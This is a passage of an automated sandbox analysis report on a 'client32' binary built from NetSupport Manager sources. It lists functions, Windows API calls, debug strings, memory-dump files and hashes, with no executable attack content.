                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hImageList, xrefs: 110161BF
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 110161BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Image$CountErrorExitLastList_MessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                              • API String ID: 3979668856-4007669474
                                                                              • Opcode ID: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                              • Instruction ID: da6b7ee7688318b2dcaecae8c32772a12d0a8ac3ffe856306cb0240b92e991ba
                                                                              • Opcode Fuzzy Hash: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                              • Instruction Fuzzy Hash: 99D02230E40136ABC3209A94BC02BC9B3886F05208F0C0465F06256040E6B468808A84
                                                                              Function 111100D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                              • API String ID: 2400454052-4183089485
                                                                              • Opcode ID: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                              • Instruction ID: 41d86d8e6b2fa9399a940e20fae9938a479a885d6893b5e9ee770bdda361f714
                                                                              • Opcode Fuzzy Hash: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                              • Instruction Fuzzy Hash: D4D01231E80736AFD7209AE5AC05BD6F3B85B04315F044539F012A6584DAB0A4458BE5
                                                                              Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                              • m_hWnd, xrefs: 1101D3A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1590435379-2830328467
                                                                              • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                              • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                              • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                              • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                              Function 11154210 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 11154234
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115421E
                                                                              • m_hWnd, xrefs: 11154223
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 67735064-2830328467
                                                                              • Opcode ID: 1d54aad98bb84251d308c7fdba18d94c17ec73c60877c839a460b4fca593964e
                                                                              • Instruction ID: 19f6c6fa1a7f22991327a281ba6cc225d63cdd76b5fbcf1c4c4c0146bd397b80
                                                                              • Opcode Fuzzy Hash: 1d54aad98bb84251d308c7fdba18d94c17ec73c60877c839a460b4fca593964e
                                                                              • Instruction Fuzzy Hash: DBD022B1A50236ABCB908691FC86BC5F3949B0A308F000436F03262404E2B4A4808391